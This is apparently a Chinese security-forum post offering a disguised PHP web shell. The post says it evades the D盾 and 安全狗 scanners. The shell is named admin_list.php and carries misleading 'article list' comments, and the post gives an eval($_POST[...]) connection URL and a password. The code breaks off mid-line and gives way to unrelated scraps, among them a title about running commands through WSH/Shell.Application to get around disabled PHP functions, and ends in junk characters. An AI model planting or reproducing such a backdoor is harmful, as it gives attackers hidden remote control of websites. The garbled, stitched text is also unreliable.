完美过D盾,安全狗的php一句话

本团队在友情检测某站时发现

无论是代码还是注释极具迷惑性

文件名称为:admin_list.php

连接方式:http://www.expdoor.com/?list=eval($_POST[expdoor]);

密码:expdoor


以下为引用代码->

<?php
/*
*
*文章列表生成文件
*/
if(isset($_GET['list'])){
   mud();
}
function mud(){
$fp=fopen('content_batch_stye.html','w');
file_put_contents('content_batch_stye.html&

php利用wsh以及Shell.Application执行命令

php利用wsh突破函数禁用执行命令(安全模式同理) - 专注网络安全! N* Y; Q7 r( ~) v, V* ^  u